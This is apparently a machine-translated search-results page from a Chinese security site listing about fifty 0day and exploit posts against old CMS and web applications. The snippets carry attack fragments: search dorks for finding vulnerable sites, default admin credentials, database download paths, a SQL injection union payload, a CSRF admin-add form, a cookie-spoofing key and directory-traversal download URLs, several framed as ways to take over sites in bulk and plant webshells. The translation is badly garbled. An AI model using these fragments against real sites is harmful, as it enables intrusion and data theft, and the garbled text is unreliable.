7620 matches found
BeeSns microblogging system V0. 2 elevation of Privilege 0day and exp-vulnerability warning-the black bar safety net
Publishing author: sub-meter Affected versions: BeeSns V0. 2 Official address: http://www.beesns.com/ Vulnerability type: elevation of Privilege Vulnerability analysis: IP filter is not strict,causing the user can submit malicious parameters to enhance their own privileges. This microblogging...
Quick. CMS v3. 0 CSRF flaws and fixes-vulnerability warning-the black bar safety net
Exploit Title: Quick CMS v3. 0 Cross Site Request Forgery Add Admin User + Author : ^Xecuti0n3r + E-mail : xecuti0n3ryahoo.com + Category : Web Apps XSRF + Dork : intext:"Quick. Cms v3. 0" inurl:admin.php + Demo CMS Link: http://opensolution.org/Quick.Cms 1 1 0 I'm ^Xecuti0n3r member from...
DiscuzX1. 5 portal Management Permissions SQL injection Bug-vulnerability warning-the black bar safety net
Discuz! X is Kang Sheng Chong want Comsenz launch of a community-based professional jianzhan platform, Forum, BBS, the personal space of SNS, the portal(Portal), group Group, application of open platform the Open Platform for full integration in one, help website realize one-stop service...
ESPCMS v5. 0 to bypass the administrator login EXP-vulnerability warning-the black bar safety net
Publishing author: sub-meter Vulnerability type: cookies cheat Vulnerability analysis: the background of the page there is cookie authentication vulnerability can be deceiving into the background. EXP: ? function eccode$string, $operation='DECODE', $key='@LFK24s224%@safS3s%1f%' $result = "; if...
Dcore(lightweight CMS)backend to get the SHELL method and repair method-vulnerability warning-the black bar safety net
Author: Mr. DzY Increase the style with the site table of the Association; Background: admin/login. asp if does not exist, the self-guess solution. Injection point:http://www. xxxx. net/index. asp? subsite=1 In tool to increase the table name: dcoreuser column name: useradmin userpassword If not...
Tencent plurality of unfixed bugs-bug warning-the black bar safety net
By Superhei Sunday, April 2 4, 2 0 1 1 One, the evil filterflag On filterflag the issue of the first report, in 2 0 0 9 year 4 month the QQmail Multiple Xss Vulnerabilities of a text,but until today the problem is not completely resolved. Multiple functions can be triggered, the most direct featu...
Siteserver CMS is the latest batch to take Station 0DAY-vulnerability warning-the black bar safety net
SiteServer CMS Web Content Management System(copyright registration number 2008SR15710 is positioned in the high-end market of CMS, content management system, it is possible to the lowest cost, minimal human input in the shortest period of time to set up a fully functional, excellent performance,...
Java floating-point value denial of service vulnerability Hazard Analysis-vulnerability warning-the black bar safety net
| By emptiness prodigal heart http://www.inbreak.net/ JAVA a vulnerability, the CVE-2 0 1 0-4 4 7 6, will result in a denial of service attack. Everyone from the Bulletin, to see such a piece of code, quite long. Meaning only the developers to write such code only on the server. We certainly will...
PHP code execution vulnerability references summary-vulnerability warning-the black bar safety net
A code execution function In PHP you can execute the Code of the function. Such as eval , assert , theand system and exec and shellexec and passthru and escapeshellcmd and pcntlexec , etc. demo code 1.1: The second file contains the code injection The file containing the function in the specific...
phpstcms (STCMS music system) to bypass the backend authentication method-vulnerability warning-the black bar safety net
Published author: the mind Vulnerability type: background verification Vulnerability analysis: a music system-0-in! Throw in the hard disk is also equal to moldy, classic white look at the code. Vulnerability exists in“common.inc.php”file, as follows. phpstcms STCMS music system to bypass the...
3 6 0 Web Manager 3.0 multiple defects and repair-vulnerability warning-the black bar safety net
Exploit Title: Multiple vulnerabilities in 3 6 0 Web Manager 3.0 Google Dork: "Powered by a 3 6 0 Web Manager 3.0" Date: 15/04/2011 Author: Ignacio Garrido Contact: [email protected] Software Link: www.360webmanager.com Version: v3. 0 Tested on: Linux 2.6.18 Vulnerability description: 3 6 0 Web...
SoftMP3 SQL injection flaws and fixes-vulnerability warning-the black bar safety net
Exploit Title: SOFTMP3 source code SQL injection Date: 23/04/2011 Author: mArTi Software Link: http://softmp3.org/ Version: No others versions available... Tested on: Windows / Unix /.................................../ Introduction/.................................../ SoftMP3 released a source...
Amanda enterprise website system cookie injection vulnerability 0day-vulnerability warning-the black bar safety net
amanda/cgProductShow. asp --------------------------------------------------------------- %@ LANGUAGE = VBScript. Encode % !-- include file="Inc/SysProduct. asp" - % ShowSmallClassType=ShowSmallClassTypeArticle dim ID ID=trimrequest"ID" if ID="" then response. Redirect"cgProduct. asp" end if...
CGSAIL website management system 0day-vulnerability warning-the black bar safety net
!-- include file="lockip/lockyou. asp" - !-- include file = cgsailconn. asp - !-- include file = Include/cgsailpubcls. asp - % dim sql dim rs sql = "select from " CgsailPrefix&"admin where id="&request"id" Set rs = Server. CreateObject"ADODB. RecordSet" rs. Open sql,conn,1,1 photo=trimrs"photo" %...
PHPBoost 3.0 backup vulnerability-vulnerability warning-the black bar safety net
Title : PHPBoost 3.0 Remote Download Backup Vulnerability Author : KedAns-Dz E-mail : [email protected] Home : HMD/AM 30008/04300 - Algeria -0 0 2 1 3 5 5 5 2 4 8 7 0 1 Twitter page : twitter.com/kedans platform : php Impact : Download Backup Database . sql File Tested on : Windows XP sp3 FR Note...
Network fun site management system-upload vulnerability-vulnerability warning-the black bar safety net
Program: web fun Site Management System 1. 2. 1 contains the dynamic version and static version are the presence of this vulnerability Download: http://www.codepub.com/d/downpage.php?n=1&id=1 8 7 1 6::1 2 8 8 1 7 3 0 2 1 FROM:http://www. st999. cn/blog DATA:2010/04/22 Use method:/kuedit/ComquUp...
Color shadow space photography management system 4. 0 Personal Edition login authentication file vulnerability-vulnerability warning-the black bar safety net
The color of the contrast space of the photographic Studio management system applicable to all types of photography studios, photography Agency, personal photography website ---------------------------------------- Photography management system backend login directory is the admin The default...
Concave Yaya article system injection vulnerability analysis-vulnerability warning-the black bar safety net
Article author:small ice Last night in the penetration of a local University website time to find a sub-Station is using the concave Yaya news publishing system, at the time in Internet for a under the about the system vulnerabilities but did not find anything, so they own out of the sleeve 4. 7A...
Hero Wide-WEB Site any download 0DAY vulnerabilities-vulnerability warning-the black bar safety net
Inadvertently see, download player pop-up when the address, http://10.0.2.100/web/html/download.asp?file=../../herotemp/jtplayer.exe Look at the download. asp source code % Dim path path=Request. QueryString"file" If path"" Then On Error Resume Next path=Server. MapPathpath downloadfilepath End I...
Thousands of brain cloud disk tasteless vulnerability of ordinary uploads change VIP download-vulnerability warning-the black bar safety net
| Thousands of brain home to open the Upload File address, out of the connection is: If the“justupload. jsp? id=”back content into any user name, for example administrator account: webtomos it. That upload address with the following: Upload files, on to VIP download. File test address: ---...
Panshi China asp the backstage management system upload vulnerability and fix-vulnerability warning-the black bar safety net
By: Red snow Official: http://www.chpanshi.net/ Ver: asp Enterprise version, the background structure is substantially a touch of the same. Large cattle bypass, this no technical content, just speak from experience, guys don't yell at me for. (Thank you Allen upx8 invitation code Nothing else, op...
K6dvd music network 0day(bypass anti-injection)-vulnerability warning-the black bar safety net
K6dvd music network 0day K6dvd television system is the domestic good music leave management system! Just find the one with a parameter of the URL to submit a' returns the following: ! Well, the anti-injection system! Most engage in penetration friends should have seen Illegal operation! The syst...
Fire article back office management system V2. 1 0day-vulnerability warning-the black bar safety net
Fire article the background management system uses the secondary classification, the interface simple and generous, features simple and easy to use, can be remote automatically upload pictures Delete the article, article related images also be deleted to reduce junk files exist. First open the...
Alcassoft's SOPHIA CMS SQL injection vulnerability-vulnerability warning-the black bar safety net
Alcassoft's SOPHIA is an international, powerful content management system. Alcassoft's SOPHIA in dsppage. cfm file existssql injectionvulnerabilities that could lead to sensitive information disclosure. Title : Alcassoft's SOPHIA CMS is Vulnerable to SQL Injection Found by: p0pc0rn 24/02/2011 We...
Simple article management system cookie injection vulnerabilities pass to kill all versions-bug warning-the black bar safety net
Simple article management system uses a classification, the interface simple, feature simple and practical. Delete the article, article related images also be deleted minus Less junk files exist. The backstage management entrance http://Domain/admin username and password are admin Backend module:...
Spirit news enterprise website system v1. 1 SQL injection exploit-vulnerability warning-the black bar safety net
Spirit news Business Site System 1. 1 version fixes search single box of the parameter assignment problem. Rewrite the product display page in the parameters passed, now don't pass parameters you can also directly open the product display page, by default shows all products. productview. the asp...
Tencent WEB QQ file transfer a tasteless vulnerabilities and fixes-vulnerability warning-the black bar safety net
Brief description: In the file name special characters not carried out inspection and restrictions. Detailed description: 2011-04-12 2 2:4 0:5 8 The other side has agreed to receive"C:\fakepath\1.asa;. jpg",began to transfer files. 2011-04-12 2 2:4 1:0 2 File"1. asa"the transfer is successful...
DZ-X1. 5 Forum latest backstage get WebShell-vulnerability warning-the black bar safety net
Discuz! X is Kang Sheng Chong want Comsenz launch of a community-based professional jianzhan platform, Forum, BBS, the personal space of SNS, the portal(Portal), group Group, application of open platform the Open Platform for full integration in one, help website realize one-stop service. Look...
QQ the auction system ewebeditor exploit bulk take Station-vulnerability warning-the black bar safety net
Batch keyword: inurl:QQsales. asp Background address: http://www.xxx.com/editer/adminlogin.asp Default account: admin admin If the password is wrong, you can download: http://www.xxxx.com/editer/db/ewebeditor.mdb, and then read the password...
SoftXMLCMS upload 0day exploit-vulnerability warning-the black bar safety net
SoftXMLCMS includes a integrated HTML content display a CMS template. All this will give you a set of tools for creating a professional website in minimum time and cost-effective manner. SoftXMLCMS is written in JavaScript ASP IIS classics, and asked Microsoft and support...
Cherry enterprise website management system v1. 0 Upload vulnerability-vulnerability warning-the black bar safety net
Cherry enterprise website management system full DIV+CSS template, multi-browser adapt perfectly compatible with IE6-IE8,Firefox, Google, etc. standards-compliant browser, the template styles centralized in a CSS style, content and style completely separated convenient website designers to develo...
EZ-Shop V1. 0 2 SQL injection vulnerability-vulnerability warning-the black bar safety net
EZ-Shop V1. 0 2 program specialoffer. php page the presence of injection vulnerabilities, can be injected into the query administrator information. MySQL version injection query: /specialoffer. php? specialid=1' union select 1,2,concat0x312720756e696f6e2073656c65637...
Easy day technology Mall 2.1 Free Edition IIS6 parsing exploits-vulnerability warning-the black bar safety net
Easy day micro Mall is E-day technologies the only official service website. Provide professional e-Commerce service,including a free online store system,supply information publishing system design and development and provide Taobao brush drill Service,Shop Agent extension services. The exploit:...
Webmaster content Alliance background Cookie spoofing exploit-vulnerability warning-the black bar safety net
Webmaster content Alliance is domestic the most widely used of a thief program, but its background verification is not strictly, by the cookie trick, you can bypass the authentication directly into the background, get a webshell in. Website content Alliance, presumably most webmasters are aware o...
W78 enterprise website backstage management system ewebeditor5. 5 exploit-vulnerability warning-the black bar safety net
w78CMS enterprise website management system is a set designed for enterprise users to tailor the ASP CMS open source systems While providing a variety of page templates,business website templates,free enterprise web systems,automatic establishment of the station system,all-round business...
phpwind (manage.php)SQL injection exploit-vulnerability warning-the black bar safety net
PHPWind is a set of used php+mysql database running and can generate a html page of new and perfect of powerful system. We hope that as an open source. Sharing software,PHPWind can to its smooth speed and high load capacity aroused you to join PHPWind camp enthusiasm! Together to create a...
Phpspy 2 0 1 0 shell authentication bypass exploit-vulnerability warning-the black bar safety net
Phpspy 2 0 1 0 shell is angel webshll 3 Musketeers sword. 2 0 1 0 version in phpspy 2 0 0 9 basis. Once again streamlined, optimized code. Achieve oracle, sybase, db2, support, etc.。。。。 phpspy code there are many unscientific place. However functionally the letter is already PHPshell inside, one ...
BigAce 2.7.5 content management system, FCK editor upload vulnerability-vulnerability warning-the black bar safety net
BigAce 2.7.5 content management system, FCK editor upload vulnerability BIGACE is a PHP and MySQL development of Web Content Management SystemCMS. Main or FCK editor problem. Now a lot of the station, would have been quite safe, but with these so-called editor, leading to a Cup. This is a...
pub918 software company website system 1. 3 the presence of multi-vulnerability-vulnerability warning-the black bar safety net
pub918 software company site system is a great-looking corporate type website Background Username Password admin Download: http://www.mycodes.net/25/4040.htm Background: admin/ Default database: admin/db/N%2 3%23ews. mdb 1, The ewebeditor problem. Path:...
Graugon 1.3 SQL injection vulnerability-vulnerability warning-the black bar safety net
Graugon is a forum program. The 1. 3 version the presence of injection vulnerabilities. The domestic use of the people looks like very little. Foreign popular. Like to engage abroad can play. Test the POC are as follows: html body onload="document. forms0. submit" form method="POST" action="" inp...
WordPress custom page plugin remote include vulnerability-vulnerability warning-the black bar safety net
Worepress a custom page plug-in there remote include vulnerability. Plugin name: wp custom pages version: 0.5.0.1 Have installed please hurry up and upgrade to the new version. Send a test. As follows: So say with a wordpress classmates don't install too many plug-ins. One more more of a danger...
PHPCMS 2 0 0 8 SP2 latest local file inclusion vulnerability-vulnerability warning-the black bar safety net
PHPCMS into the hardest hit. A vulnerability would allow people to storm out. 0day also often have. Nonsense not much said. Directly on the method. Take the shell method: Contains:admin/safe. inc. php file GET submitted data Will be generated under the root directory a word Encrypt the following...
Amanda enterprise web site management system database background upload get WebShell-vulnerability warning-the black bar safety net
Amanda enterprise website CMS system 程序 下载 http://www.mycodes.net/25/3430.htm ----------------------------------------------------------------------------------- Keywords: inurl:cgProductShow. asp? Background: amdin Default database: Databases\tb11. mdb Do not do anti-download, if you encounter...
ShopEx V4. 8(v4. 8 4,v4. 8 5) the background write WebShell-vulnerability warning-the black bar safety net
ShopEx online store system sales platform, is one of the earliest online shop software provider; is currently the shop system continued research and development of the oldest of the company; is currently the shop software domestic the highest market share of the software provider; is currently th...
Tencent Weibo falsification of information vulnerability, other microblogging is also affected by the impact-vulnerability warning-the black bar safety net
Brief description: Can be forged to anyone on Twitter, April Fools ' day entertainment the vulnerability, we know. Detailed description: In the meager dialogue and the broadcast send: Test || @mA:I'm not mA Can disguise mA huateng participate in the dialogue. Vulnerability to prove: Repair...
Large power online online distance learning platform 0DAY National Electrical chase to eat)-vulnerability warning-the black bar safety net
Brief description: Long time of vulnerability, the vendor iswww.open.edu.cn, today finishing the blog found this 0day can also use the publication to the next. A plurality of injection vulnerabilities, filtering and etc. but can bypass the database connection configuration file is exposed,...
phpcms local contains a vulnerability caused by a write shell vulnerability, and delete arbitrary file vulnerability-vulnerability warning-the black bar safety net
by [email protected] phpcms2008 sp2 or sp4 even didn't look carefully These days a bug vulnerable., manufacturers ignored, is as install X, OK, the mood is unhappy. no matter so much. phpcms local contains to get the shell method, this article connected to a the phpcms the phpcmsauth result o...
DirectAdmin 0day-vulnerability warning-the black bar safety net
Generally LINUX is a virtual host, it is difficult to mention the right, it is difficult to rebound. MSF and PHP that vulnerability is the exception. It may not be. If there is a management platform DirectAdmin Then you can be successful The default login address http://ip:2222/ In LINUX under...
. net the latest mention of the right to 0day, the pass to kill the windows-vulnerability warning-the black bar safety net
ps: this can be once compiled successfully, without modification....... From: http://www.exploit-db.com/exploits/16940/ exploit-db comparison and kind, and is not compiled on the difficult side dish....... / Exploit Title: . NET Runtime Optimization Service Privilege Escalation Date: 03-07-2011...
syWebEditor editor latest 0day-vulnerability warning-the black bar safety net
syWebEditor editor there upload vulnerability, but also resolve the problem, with other the emergence of this vulnerability Editor. exp:http://www. tmdsb. com/syWebEditor/SelUploadFile. asp? obj=ProPhoto&fileType=gif%7Cjpg%7Cpng% 7C&filePathType=1&filePath=/PhotoFile/ProFile/ After uploading the...